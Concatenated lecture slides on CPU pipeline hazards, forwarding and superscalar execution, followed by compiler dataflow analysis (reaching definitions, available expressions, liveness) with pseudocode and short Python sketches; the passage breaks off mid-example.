<tr><th></th><th>1</th><th>2</th><th>3</th><th>4</th><th>5</th><th>6</th><th>7</th><th>8</th></tr>
</thead>
<tbody>
<tr><td>ADD R1,R2,R3</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td></tr>
<tr><td>Instr A / NOP</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td></tr>
<tr><td>Instr B / NOP</td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td></tr>
<tr><td>MUL R0,R1,R1</td><td></td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td></tr>
</tbody>
</table>
Forwarding
• We can add extra data paths for specific cases
– The output of EX feeds back into the input of EX
– Sends the data to next instruction
• Control becomes more complex
Why did it Occur?
• Due to the design of our pipeline
• In this case, the result we want is ready one stage ahead (EX) of where it was needed (ID)
– why wait until it goes down the pipeline?
• But, ...what if we have the sequence
LDR R1,[R2,R3]
MUL R0,R1,R1
• LDR = load R1 from memory address R2+R3
– Now the result we want will be ready after MEM stage
Pipeline Sequence for LDR
• Fetch
• Decode and read registers (R2 & R3)
• Execute – add R2+R3 to form address
• Memory access, read from address [R2+R3]
• Now we can write the value into register R1
More Forwarding
- MUL has to wait until LDR finishes MEM
- We need to add extra paths from MEM to EX
- Control becomes even more complex
## Forwarding Example
Example program: `LDR r1,A` ; `LDR r2,B` ; `ADD r3,r1,r2` ; `ST r3,C`
**Without Forwarding** — operands are read in ID, no earlier than the producer's WB:
<table>
<thead>
<tr><th></th><th>1</th><th>2</th><th>3</th><th>4</th><th>5</th><th>6</th><th>7</th><th>8</th><th>9</th><th>10</th><th>11</th><th>12</th></tr>
</thead>
<tbody>
<tr><td>LDR r1,A</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>LDR r2,B</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>ADD r3,r1,r2</td><td></td><td></td><td>IF</td><td>stall</td><td>stall</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td></tr>
<tr><td>ST r3,C</td><td></td><td></td><td></td><td>IF</td><td>stall</td><td>stall</td><td>stall</td><td>stall</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td></tr>
</tbody>
</table>
**With Forwarding** — results are fed into EX as soon as they exist (after EX for ALU results, after MEM for loads):
<table>
<thead>
<tr><th></th><th>1</th><th>2</th><th>3</th><th>4</th><th>5</th><th>6</th><th>7</th><th>8</th><th>9</th></tr>
</thead>
<tbody>
<tr><td>LDR r1,A</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td><td></td></tr>
<tr><td>LDR r2,B</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td></tr>
<tr><td>ADD r3,r1,r2</td><td></td><td></td><td>IF</td><td>ID</td><td>stall</td><td>EX</td><td>MEM</td><td>WB</td><td></td></tr>
<tr><td>ST r3,C</td><td></td><td></td><td></td><td>IF</td><td>ID</td><td>stall</td><td>EX</td><td>MEM</td><td>WB</td></tr>
</tbody>
</table>
The program takes 12 cycles without forwarding but 9 with it; only the load-use dependency on r2 still costs a stall.
Deeper Pipelines
• As mentioned previously we can go to longer pipelines
– Do less per pipeline stage
– Each step takes less time
– So clock frequency increases
– But greater penalty for hazards
– More complex control
• A trade-off between many aspects needs to be made
– Frequency, power, area, ...
Data Hazard Example
Consider the following program which implements \( R = A^2 + B^2 \)
```
LD r1, A
MUL r2, r1, r1 -- A^2
LD r3, B
MUL r4, r3, r3 -- B^2
ADD r5, r2, r4 -- A^2 + B^2
ST r5, R
```
a) Draw its dependency diagram
b) Simulate its execution in a basic 5-stage pipeline without forwarding.
*(The slide provides a blank 24-cycle grid, one row per instruction from `LD r1, A` to `ST r5, R`, for working through the simulation.)*
c) Simulate the execution in a 5-stage pipeline with forwarding.
Where Next?
• Despite these difficulties, it is possible to build processors which approach 1 instruction per cycle (IPC)
• Given that the computational model is one of serial instruction execution, can we do any better than this?
Instruction Level Parallelism
Instruction Level Parallelism (ILP)
• Suppose we have an expression of the form \( x = (a+b) * (c-d) \)
• Assuming \( a, b, c \) & \( d \) are in registers, this might turn into
ADD R0, R2, R3
SUB R1, R4, R5
MUL R0, R0, R1
STR R0, x
ILP (cont)
• The MUL has a dependence on the ADD and the SUB, and the STR has a dependence on the MUL
• However, the ADD and SUB are independent
• In theory, we could execute them in parallel, even out of order
ADD R0, R2, R3
SUB R1, R4, R5
MUL R0, R0, R1
STR R0, x
The Dependency Graph
a.k.a. Data Flow graph
• We can see this more clearly if we plot it as a dependency graph (or data flow)
![Diagram of dependency graph with nodes ADD, SUB, and MUL, and inputs R2, R3, R4, R5 leading to output X.]
As long as R2, R3, R4 & R5 are available, we can execute the ADD & SUB in parallel.
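The dependence check sketched above can be made concrete. The following is a minimal Python sketch (not from the slides): it tracks, for each register, the last instruction that wrote it, derives the RAW dependence graph for the `x = (a+b) * (c-d)` sequence, and lists the instruction pairs that are mutually independent.

```python
# Build the dependency (data-flow) graph for the example sequence by
# recording, per register, the last instruction that wrote it.
instrs = [
    ("ADD", "R0", ["R2", "R3"]),  # R0 = R2 + R3
    ("SUB", "R1", ["R4", "R5"]),  # R1 = R4 - R5
    ("MUL", "R0", ["R0", "R1"]),  # R0 = R0 * R1
    ("STR", None, ["R0"]),        # store R0 to x (writes no register)
]

last_writer = {}                       # register -> writing instruction index
deps = {i: set() for i in range(len(instrs))}
for i, (_, dst, srcs) in enumerate(instrs):
    for r in srcs:                     # true (read-after-write) dependences
        if r in last_writer:
            deps[i].add(last_writer[r])
    if dst is not None:
        last_writer[dst] = i

def ancestors(i):
    """All instructions i depends on, directly or transitively."""
    seen, stack = set(), list(deps[i])
    while stack:
        j = stack.pop()
        if j not in seen:
            seen.add(j)
            stack.extend(deps[j])
    return seen

# Pairs with no dependence either way could issue in parallel.
independent_pairs = [(i, j) for i in deps for j in deps
                     if i < j and i not in ancestors(j) and j not in ancestors(i)]
```

Here `independent_pairs` comes out as `[(0, 1)]`: only the ADD and the SUB are mutually independent, matching the graph.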
Amount of ILP?
- This is obviously a very simple example
- However, real programs often have quite a few independent instructions which could be executed in parallel
- The exact amount is clearly program-dependent, but analysis has shown that an ILP of around 4 is common (in parts of the program, anyway)
How to Exploit?
• We need to fetch multiple instructions per cycle – wider instruction fetch
• Need to decode multiple instructions per cycle
• But must use common registers – they are logically the same registers
• Need multiple ALUs for execution
• But also access common data cache
Dual Issue Pipeline
• Two instructions can now execute in parallel
• (Potentially) double the execution rate
• Called a ‘Superscalar’ architecture (2-way)
Register & Cache Access
• Note the access rate to both registers & cache will be doubled
• To cope with this we may need a **dual ported** register bank & **dual ported** caches
• This can be done either by duplicating access circuitry or even duplicating whole register & cache structure
Selecting Instructions
• To get the doubled performance out of this structure, we need to have independent instructions.
• We can have a ‘dispatch unit’ in the fetch stage which uses hardware to examine the instruction dependencies and only issue two in parallel if they are independent.
Instruction dependencies
• If we had
ADD R1,R1,R0
MUL R2,R1,R1
ADD R3,R4,R5
MUL R6,R3,R3
• Issued in pairs as above
• We would not be able to issue any in parallel because of dependencies
Instruction reorder
• If we examine dependencies and reorder
| Original order | Reordered |
|---|---|
| ADD R1,R1,R0 | ADD R1,R1,R0 |
| MUL R2,R1,R1 | ADD R3,R4,R5 |
| ADD R3,R4,R5 | MUL R2,R1,R1 |
| MUL R6,R3,R3 | MUL R6,R3,R3 |
• We can now execute pairs in parallel (assuming appropriate forwarding logic)
Example of 2-way Superscalar
Dependency Graph
ADD R0, R2, R3
SUB R1, R4, R5
MUL R0, R0, R1
STR R0, x
MUL R2, R3, R4
STR R2, y
## 2-way Superscalar Execution
### Scalar Processor
<table>
<thead>
<tr><th>Instruction</th><th>Cycle 1</th><th>Cycle 2</th><th>Cycle 3</th><th>Cycle 4</th><th>Cycle 5</th><th>Cycle 6</th><th>Cycle 7</th><th>Cycle 8</th><th>Cycle 9</th><th>Cycle 10</th></tr>
</thead>
<tbody>
<tr><td>ADD R0, R2, R3</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td><td></td><td></td></tr>
<tr><td>SUB R1, R4, R5</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td><td></td></tr>
<tr><td>MUL R0, R0, R1</td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td></tr>
<tr><td>MUL R2, R3, R4</td><td></td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td></tr>
<tr><td>STR R0, x</td><td></td><td></td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td></tr>
<tr><td>STR R2, y</td><td></td><td></td><td></td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td></tr>
</tbody>
</table>
### Superscalar Processor
<table>
<thead>
<tr><th>Instruction</th><th>Cycle 1</th><th>Cycle 2</th><th>Cycle 3</th><th>Cycle 4</th><th>Cycle 5</th><th>Cycle 6</th><th>Cycle 7</th></tr>
</thead>
<tbody>
<tr><td>ADD R0, R2, R3</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td></tr>
<tr><td>SUB R1, R4, R5</td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td><td></td></tr>
<tr><td>MUL R0, R0, R1</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td></tr>
<tr><td>MUL R2, R3, R4</td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td><td></td></tr>
<tr><td>STR R0, x</td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td></tr>
<tr><td>STR R2, y</td><td></td><td></td><td>IF</td><td>ID</td><td>EX</td><td>MEM</td><td>WB</td></tr>
</tbody>
</table>
Limits of ILP
• Modern processors are up to 4-way superscalar (but rarely achieve 4× speed)
• Not much beyond this
– Hardware complexity
– Limited amounts of ILP in real programs
• Limited ILP is not surprising: conventional programs are written assuming a serial execution model
Consider the following program which implements $R = A^2 + B^2 + C^2 + D^2$
```
LD r1, A
MUL r2, r1, r1 -- A^2
LD r3, B
MUL r4, r3, r3 -- B^2
ADD r11, r2, r4 -- A^2 + B^2
LD r5, C
MUL r6, r5, r5 -- C^2
LD r7, D
MUL r8, r7, r7 -- D^2
ADD r12, r6, r8 -- C^2 + D^2
ADD r21, r11, r12 -- A^2 + B^2 + C^2 + D^2
ST r21, R
```
As written, the code is poorly suited to a superscalar pipeline: each MUL depends on the instruction immediately before it, so adjacent instructions often cannot issue together.
Superscalar Example
a) Reorder the instructions to exploit superscalar execution. Assume all kinds of forwarding are implemented.
Reordering Instructions
Compiler Optimisation
- Reordering can be done by the compiler
- If the compiler cannot reorder the instructions, we still need hardware to detect issue conflicts (and stall)
- But if we could rely on the compiler, we could get rid of the expensive checking logic
- This is the principle of VLIW (Very Long Instruction Word)
- The compiler must add NOPs where necessary
Compiler Limitations
- There are arguments against relying on the compiler
- Legacy binaries – optimum code tied to a particular hardware configuration
- ‘Code Bloat’ in VLIW – useless NOPs
- Instead, we can rely on hardware to re-order instructions if necessary
- Out-of-order processors
- Complex but effective
Out of Order Processors
- An instruction buffer needs to be added to store all issued instructions
- A dynamic scheduler is in charge of sending conflict-free instructions to execute
- Memory and register accesses need to be delayed until all older instructions are finished to comply with application semantics
Out of Order Execution
- What changes in an out-of-order processor
- Instruction Dispatching and Scheduling
- Memory and register accesses deferred
CS 526
Advanced Compiler Construction
http://misailo.cs.illinois.edu/courses/cs526
DATAFLOW ANALYSIS
The slides adapted from Saman Amarasinghe, Martin Rinard and Vikram Adve
Why Dataflow Analysis?
Answers key questions about the flow of values and other program properties over control-flow paths at compile-time.
Why Dataflow Analysis?
**Compiler fundamentals**
What defs. of x reach a given use of x (and vice-versa)?
What {<ptr,target>} pairs are possible at each statement?
**Scalar dataflow optimizations**
Are any uses reached by a particular definition of x?
Has an expression been computed on all incoming paths?
What is the innermost loop level at which a variable is defined?
**Correctness and safety:**
Is variable x defined on every path to a use of x?
Is a pointer to a local variable live on exit from a procedure?
**Parallel program optimization**
Where is dataflow analysis used?
Everywhere
Where is dataflow analysis used?
**Preliminary Analyses**
- Pointer Analysis
- Detecting uninitialized variables
- Type inference
- Strength Reduction for Induction Variables
**Static Computation Elimination**
- Dead Code Elimination (DCE)
- Constant Propagation
- Copy Propagation
**Redundancy Elimination**
- Local Common Subexpression Elimination (CSE)
- Global Common Subexpression Elimination (GCSE)
- Loop-invariant Code Motion (LICM)
- Partial Redundancy Elimination (PRE)
**Code Generation**
- Liveness analysis for register allocation
**Basic Term Review**
**Point**: A location in a basic block just before or after some statement.
**Path**: A path from points $p_1$ to $p_n$ is a sequence of points $p_1, p_2, \ldots p_n$ such that (intuitively) some execution can visit these points in order.
**Kill of a Definition**: A definition $d$ of variable $V$ is killed on a path if there is an unambiguous (re)definition of $V$ on that path.
**Kill of an Expression**: An expression $e$ is killed on a path if there is a possible definition of any of the variables of $e$ on that path.
Dataflow Analysis (Informally)
Symbolically simulate execution of program
- Forward (Reaching Definitions)
- Backward (Variable Liveness)
Stacked analyses and transformations that work together, e.g.
- Reaching Definitions $\rightarrow$ Constant Propagation
- Variable Liveness $\rightarrow$ Dead code elimination
Our plan:
- Examples first (analysis + theory)
- Theory follows
Analysis: Reaching Definitions
A definition \( d \) reaches point \( p \) if there is a path from the point after \( d \) to \( p \) such that \( d \) is not killed along that path.
Example Statements:
\[
\begin{align*}
a &= x+y \\
b &= a+1
\end{align*}
\]
- It is a definition of \( a \)
- It is a use of \( x \) and \( y \)
A definition reaches a use if the value written by the definition may be read by the use.
```plaintext
1: s = 0;
2: a = 4;
3: i = 0;
if (k == 0)
    4: b = 1;
else
    5: b = 2;
while (i < n) {
    6: s = s + a*b;
    7: i = i + 1;
}
return s;
```
Reaching Definitions (Declarative)
Dataflow variables (for each block B)
\[ \text{In}(B) \equiv \text{the set of defs that reach the point before first statement in } B \]
\[ \text{Out}(B) \equiv \text{the set of defs that reach the point after last statement in } B \]
\[ \text{Gen}(B) \equiv \text{the set of defs in B that are not killed in B.} \]
\[ \text{Kill}(B) \equiv \text{the set of all defs that are killed in } B \text{ (i.e., on the path from entry to exit of } B \text{, if def } d \notin B \text{; or on the path from } d \text{ to exit of } B \text{, if def } d \in B \text{).} \]
The difference:
\[ \text{In}(B), \text{Out}(B) \text{ are } \textbf{global} \text{ dataflow properties (of the function).} \]
\[ \text{Gen}(B), \text{Kill}(B) \text{ are } \textbf{local} \text{ properties of the basic block B alone.} \]
Computing Reaching Definitions
Compute with sets of definitions
- represent sets using bit vectors data structure
- each definition has a position in bit vector
At each basic block, compute
- definitions that reach the start of block
- definitions that reach the end of block
Perform computation by simulating execution of program until reach fixed point
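With defs numbered 1–7 as in the running example, the per-block update is plain mask arithmetic. A minimal sketch (the GEN/KILL sets below are those of the `b = 2` block):

```python
def to_bits(defs, n=7):
    """Set of def numbers -> bit vector, def d at position d from the left."""
    return sum(1 << (n - d) for d in defs)

def transfer(in_, gen, kill):
    """OUT = (IN - KILL) U GEN, as bitwise operations."""
    return (in_ & ~kill) | gen

IN = to_bits({1, 2, 3})        # 1110000: defs 1-3 reach the block entry
GEN = to_bits({5})             # the block contains def 5 (b = 2) ...
KILL = to_bits({4})            # ... which kills def 4 (b = 1)
OUT = transfer(IN, GEN, KILL)  # 1110100
```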
[Figure: the example CFG annotated with reaching-definition bit vectors (bit positions 1–7 correspond to defs 1: s = 0, 2: a = 4, 3: i = 0, 4: b = 1, 5: b = 2, 6: s = s + a*b, 7: i = i + 1). Starting from 0000000, the simulation converges: 1110000 after the entry block, 1111000 after b = 1, 1110100 after b = 2, 1111111 entering the loop body 6–7 once the back edge is included, and 0101111 leaving it (defs 6 and 7 kill defs 1 and 3).]
Formalizing the analysis: Dataflow Equations
IN and OUT combine the properties from the neighboring blocks in CFG
\[ \text{IN}[b] = \text{OUT}[b_1] \cup \ldots \cup \text{OUT}[b_n] \]
- where \( b_1, \ldots, b_n \) are predecessors of \( b \) in CFG
\[ \text{OUT}[b] = (\text{IN}[b] - \text{KILL}[b]) \cup \text{GEN}[b] \]
\[ \text{IN}[\text{entry}] = 0000000 \]
Result: system of equations
Solving Equations
Use fixed point (worklist) algorithm
Initialize with solution of $\text{OUT}[b] = 0000000$
- Repeatedly apply equations
1. $\text{IN}[b] = \text{OUT}[b_1] \cup ... \cup \text{OUT}[b_n]$
2. $\text{OUT}[b] = (\text{IN}[b] - \text{KILL}[b]) \cup \text{GEN}[b]$
- Until reach fixed point*
* Fixed point = equation application has no further effect
Use a worklist to track which equation applications may have a further effect
Reaching Definitions Algorithm
for all nodes $n$ in $N$
\[ \text{OUT}[n] = \text{emptyset}; \quad \text{// or initialize } \text{OUT}[n] = \text{GEN}[n] \]
$\text{IN}[\text{Entry}] = \text{emptyset};$
$\text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}];$
$\text{Changed} = N - \{ \text{Entry} \}; \quad \text{// } N = \text{all nodes in graph}$
while (Changed != emptyset)
choose a node $n$ in Changed;
Changed = Changed - $\{ n \}; \quad \text{// in efficient impl. these are bitvector operations}$
$\text{IN}[n] = \text{emptyset};$
for all nodes $p$ in predecessors($n$)
$\text{IN}[n] = \text{IN}[n] \cup \text{OUT}[p];$
$\text{OUT}[n] = \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n]);$
if (OUT[$n$] changed)
for all nodes $s$ in successors($n$)
Changed = Changed U $\{ s \};$
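The pseudocode above transcribes almost line for line into Python. A sketch on a small hypothetical three-block CFG with a back edge (block names and def sets are invented for illustration; plain sets stand in for bit vectors):

```python
def reaching_definitions(nodes, preds, succs, gen, kill, entry):
    """Worklist solver for reaching definitions, as in the pseudocode."""
    out = {n: set() for n in nodes}
    out[entry] = set(gen[entry])
    in_ = {n: set() for n in nodes}
    changed = set(nodes) - {entry}
    while changed:
        n = changed.pop()
        in_[n] = set()
        for p in preds[n]:                  # IN[n] = union of preds' OUT
            in_[n] |= out[p]
        new_out = gen[n] | (in_[n] - kill[n])
        if new_out != out[n]:               # re-examine successors on change
            out[n] = new_out
            changed |= set(succs[n])
    return in_, out

# Hypothetical 3-block CFG: B1 -> B2 -> B3, with a back edge B3 -> B2.
nodes = ["B1", "B2", "B3"]
preds = {"B1": [], "B2": ["B1", "B3"], "B3": ["B2"]}
succs = {"B1": ["B2"], "B2": ["B3"], "B3": ["B2"]}
gen = {"B1": {"d1"}, "B2": {"d2"}, "B3": {"d3"}}
kill = {"B1": set(), "B2": {"d1"}, "B3": set()}  # d2 redefines d1's variable
in_, out = reaching_definitions(nodes, preds, succs, gen, kill, "B1")
```

At the fixed point the back edge has carried d2 and d3 around the loop, so `in_["B2"]` contains all three defs.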
Reaching Definitions: Convergence
Out[B] is finite
Out[B] never decreases for any B
\[ \Rightarrow \text{must eventually stop changing} \]
At most n iterations if n blocks
\[ \Leftarrow \text{Definitions need to propagate only over acyclic paths} \]
**Transform: Constant Propagation**
Paired with reaching definitions (uses its results)
Check: Is a use of a variable a constant?
- Check all reaching definitions
- If all assign variable to same constant
- Then use is in fact a constant
Can replace variable with constant
1. \( s = 0; \)
2. \( a = 4; \)
3. \( i = 0; \)
4. \( b = 1; \)
5. \( b = 2; \)
6. \( s = s + a \cdot b; \)
7. \( i = i + 1; \)
Return \( s \)
Is `a` a constant in `s = s + a*b`?
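The check itself is small. A sketch (not the slides' code): reaching definitions are modelled as hypothetical (variable, value) pairs, with value `None` for a non-constant assignment such as `s = s + a*b`.

```python
def constant_value(var, reaching_defs):
    """Return the constant if every reaching def of var assigns it,
    else None (not provably constant)."""
    vals = {val for (v, val) in reaching_defs if v == var}
    if len(vals) == 1 and None not in vals:
        return vals.pop()
    return None

# Defs reaching `s = s + a*b` in the example:
reaching = {("s", 0), ("s", None),   # s = 0 and the loop's s = s + a*b
            ("a", 4),                # a = 4
            ("b", 1), ("b", 2)}      # b = 1 and b = 2
```

`constant_value("a", reaching)` gives 4, so the use of `a` can be replaced by the constant; `b` may be 1 or 2, so it stays.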
Analysis: Available Expressions
An expression \(x+y\) is available at a point \(p\) if
1. Every path from the initial node to \(p\) must evaluate \(x+y\) before reaching \(p\),
2. There are no assignments to \(x\) or \(y\) after the expression evaluation but before \(p\).
Available Expression information can be used to do global (across basic blocks) CSE
- If expression is available at use, no need to reevaluate it
- Beyond SSA-form analyses
Example: Available Expression
\[
\begin{align*}
a &= b + c \\
d &= e + f \\
f &= a + c \\
g &= a + c \\
b &= a + d \\
h &= c + f \\
j &= a + b + c + d
\end{align*}
\]
Is the Expression Available?
YES!
\[ a = b + c \]
\[ d = e + f \]
\[ f = a + c \]
\[ g = a + c \]
\[ b = a + d \]
\[ h = c + f \]
\[ j = a + b + c + d \]
Is the Expression Available?
\[ a = b + c \]
\[ d = e + f \]
\[ f = a + c \]
\[ g = a + c \]
\[ b = a + d \]
\[ h = c + f \]
\[ j = a + b + c + d \]
NO!
Transformation: Common Subexpression Elimination
Uses the results of available expressions
Check:
• If the expression is available and computed before,
Transform:
• At the first location, create a temporary variable
• Replace the latter occurrence(s) with the temporary variable name.
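For straight-line code whose operands are not redefined in between, the transform can be sketched as below (a deliberately simplified sketch, not the slides' algorithm: it gives every expression a primed temporary, reused or not, and ignores kills):

```python
def local_cse(stmts):
    """stmts: list of (dst, expr) pairs; returns the rewritten list."""
    first = {}                   # expr -> temporary holding its value
    out = []
    for dst, expr in stmts:
        if expr in first:
            out.append((dst, first[expr]))  # later occurrence: copy the temp
        else:
            t = dst + "'"                   # e.g. f -> f'
            first[expr] = t
            out.append((t, expr))           # compute once into the temp
            out.append((dst, t))
    return out

# The f = a+c; g = a+c fragment from the example:
rewritten = local_cse([("f", "a+c"), ("g", "a+c")])
# -> f' = a+c; f = f'; g = f', as in the slides' transformed code
```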
Use of Available Expression
YES!
\[ a = b + c \]
\[ d = e + f \]
\[ f = a + c \]
\[ g = a + c \]
\[ b = a + d \]
\[ h = c + f \]
\[ j = a + b + c + d \]
Use of Available Expression
YES!
\[ a = b + c \]
\[ d = e + f \]
\[ f = a + c \]
\[ g = a + c \]
\[ b = a + d \]
\[ h = c + f \]
\[ j = a + b + c + d \]
Use of Available Expression
\[
\begin{align*}
a &= b + c \\
d &= e + f \\
f' &= a + c \\
f &= f' \\
g &= f' \\
b &= a + d \\
h &= c + f \\
j &= a + b + c + d
\end{align*}
\]
Use of Available Expression
\[ a = b + c \]
\[ d = e + f \]
\[ f' = a + c \]
\[ f = f' \]
\[ g = f' \]
\[ b = a + d \]
\[ h = c + f \]
\[ j = f' + b + d \]
Formalizing Analysis
Each basic block has
- **IN** = set of expressions available at start of block
- **OUT** = set of expressions available at end of block
- **GEN** = set of expressions computed in block
- **KILL** = set of expressions killed in block
- Compiler scans each basic block to derive GEN and KILL sets
- Comparison with reaching definitions:
- definition reaches a basic block if it comes from **ANY** predecessor in CFG
- expression is available at a basic block only if it is available from **ALL** predecessors in CFG
Dataflow Equations
- $\text{IN}[b] = \text{OUT}[b_1] \cap ... \cap \text{OUT}[b_n]$
- where $b_1, ..., b_n$ are predecessors of $b$ in CFG
- $\text{OUT}[b] = (\text{IN}[b] - \text{KILL}[b]) \cup \text{GEN}[b]$
- $\text{IN}[\text{entry}] = 0000$
- Result: system of equations
Solving Equations
- Use fixed point algorithm
- \( \text{IN[entry]} = 0000 \)
- Initialize \( \text{OUT[b]} = 1111 \)
- Repeatedly apply equations
- \( \text{IN[b]} = \text{OUT[b1]} \cap \ldots \cap \text{OUT[bn]} \)
- \( \text{OUT[b]} = (\text{IN[b]} - \text{KILL[b]}) \cup \text{GEN[b]} \)
- Use a worklist algorithm to reach fixed point
Available Expressions Algorithm
for all nodes n in N
OUT[n] = E; // OUT[n] = E - KILL[n];
IN[Entry] = emptyset;
OUT[Entry] = GEN[Entry];
Changed = N - { Entry }; // N = all nodes in graph
while (Changed != emptyset)
choose a node n in Changed;
Changed = Changed - { n };
IN[n] = E; // E is set of all expressions
for all nodes p in predecessors(n)
IN[n] = IN[n] ∩ OUT[p];
OUT[n] = GEN[n] U (IN[n] - KILL[n]);
if (OUT[n] changed)
for all nodes s in successors(n)
Changed = Changed U { s };
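Side by side with reaching definitions, only two lines change: the optimistic initialisation OUT[n] = E and the intersection at joins. A sketch on a hypothetical diamond CFG (block names and expression sets invented for illustration):

```python
def available_expressions(nodes, preds, succs, gen, kill, entry, E):
    """Worklist solver; differs from reaching defs only in the
    initialisation to E and the intersection at joins."""
    out = {n: set(E) for n in nodes}        # optimistic: everything available
    out[entry] = set(gen[entry])
    in_ = {n: set() for n in nodes}
    changed = set(nodes) - {entry}
    while changed:
        n = changed.pop()
        in_[n] = set(E)
        for p in preds[n]:                  # available on ALL predecessors
            in_[n] &= out[p]
        new_out = gen[n] | (in_[n] - kill[n])
        if new_out != out[n]:
            out[n] = new_out
            changed |= set(succs[n])
    return in_, out

# Hypothetical diamond CFG: b+c computed on both branches, e+f on one.
E = {"b+c", "e+f"}
nodes = ["B1", "B2", "B3", "B4"]
preds = {"B1": [], "B2": ["B1"], "B3": ["B1"], "B4": ["B2", "B3"]}
succs = {"B1": ["B2", "B3"], "B2": ["B4"], "B3": ["B4"], "B4": []}
gen = {"B1": set(), "B2": {"b+c", "e+f"}, "B3": {"b+c"}, "B4": set()}
kill = {n: set() for n in nodes}
in_, out = available_expressions(nodes, preds, succs, gen, kill, "B1", E)
```

`b+c` is generated on both branches, so it is available at B4; `e+f` is generated on only one, so the intersection drops it.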
Questions
Does algorithm always halt?
If expression is available in some execution, is it always marked as available in analysis?
If expression is not available in some execution, can it be marked as available in analysis?
**Analysis: Variable Liveness**
A variable \( v \) is live at point \( p \) if
- \( v \) is used along some path starting at \( p \), and
- no definition of \( v \) along the path before the use.
When is a variable \( v \) dead at point \( p \)?
- No use of \( v \) on any path from \( p \) to exit node, or
- If all paths from \( p \) redefine \( v \) before using \( v \).
What Use is Liveness Information?
Register allocation.
• If a variable is dead, can reassign its register
Dead code elimination.
• Eliminate assignments to variables not read later.
• But must not eliminate last assignment to variable (such as instance variable) visible outside CFG.
• Can eliminate other dead assignments.
• Handle by making all externally visible variables live on exit from CFG
Conceptual Idea of Analysis
- Simulate execution
- But start from exit and go backwards in CFG
- Compute liveness information from end to beginning of basic blocks
Liveness Example
• Assume a, b, c visible outside method
• So they are live on exit
• Assume x, y, z, t not visible outside method
• Represent Liveness Using Bit Vector
– order is abcxyzt
Transformation: Dead Code Elimination
- Assume $a,b,c$ visible outside method
- So they are live on exit
- Assume $x,y,z,t$ not visible outside method
- Represent Liveness Using Bit Vector
- order is abcxyzt
- Remove dead definitions
Transformation: Dead Code Elimination
- Assume \(a, b, c\) visible outside method
- So they are live on exit
- Assume \(x, y, z, t\) not visible outside method
- Represent Liveness Using Bit Vector
- order is \(abcxyzt\)
- Remove dead definitions
Formalizing Analysis
• Each basic block has
– IN - set of variables live at start of block
– OUT - set of variables live at end of block
– USE - set of variables with upwards exposed uses in block
– DEF - set of variables defined in block
• USE\[x = z; x = x+1;\] = \{ z \} (x not in USE)
• DEF\[x = z; x = x+1; y = 1;\] = \{x, y\}
• Compiler scans each basic block to derive USE and DEF sets
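The scan is a single forward pass over the block: a use counts only if the variable has not already been defined earlier in the same block. A sketch (statements as hypothetical (defined_var, used_vars) pairs):

```python
def use_def(block):
    """Return (USE, DEF) for a basic block given as (dst, srcs) pairs."""
    use, defined = set(), set()
    for dst, srcs in block:
        use |= {v for v in srcs if v not in defined}  # upwards-exposed uses
        defined.add(dst)
    return use, defined

# The slide's examples:
u1, d1 = use_def([("x", ["z"]), ("x", ["x"])])             # x = z; x = x+1
u2, d2 = use_def([("x", ["z"]), ("x", ["x"]), ("y", [])])  # ...; y = 1
```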
Liveness Algorithm
for all nodes n in N - { Exit }
IN[n] = emptyset;
OUT[Exit] = emptyset;
IN[Exit] = use[Exit];
Changed = N - { Exit };
while (Changed != emptyset)
choose a node n in Changed;
Changed = Changed - { n };
OUT[n] = emptyset;
for all nodes s in successors(n)
OUT[n] = OUT[n] U IN[s];
IN[n] = use[n] U (OUT[n] - def[n]);
if (IN[n] changed)
for all nodes p in predecessors(n)
Changed = Changed U { p };
Similar to Other Dataflow Algorithms
Backwards analysis, not forwards
Still have transfer functions
Still have confluence operators
Can generalize framework to work for both forwards and backwards analyses
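One worklist engine really can serve both directions: run backward, the "input" side of a node is fed by its successors, and the transfer output is the node's live-in. A sketch (simplified: every node starts on the worklist; the two-block CFG and use/def sets are invented):

```python
def dataflow(nodes, edges_in, edges_out, gen, kill, merge, init):
    """Generic worklist solver. For a forward analysis pass preds/succs
    as edges_in/edges_out; for a backward one, pass succs/preds."""
    val_out = {n: set(init) for n in nodes}  # value leaving the transfer fn
    val_in = {n: set() for n in nodes}       # merged value entering it
    changed = set(nodes)
    while changed:
        n = changed.pop()
        ins = [val_out[p] for p in edges_in[n]]
        val_in[n] = merge(ins) if ins else set()
        new = gen[n] | (val_in[n] - kill[n])
        if new != val_out[n]:
            val_out[n] = new
            changed |= set(edges_out[n])
    return val_in, val_out

union = lambda sets: set().union(*sets)      # confluence for may-analyses

# Liveness = the engine run backward: successors feed each node, so
# val_in is the live-out map and val_out is the live-in map.
nodes = ["B1", "B2"]
succs = {"B1": ["B2"], "B2": []}
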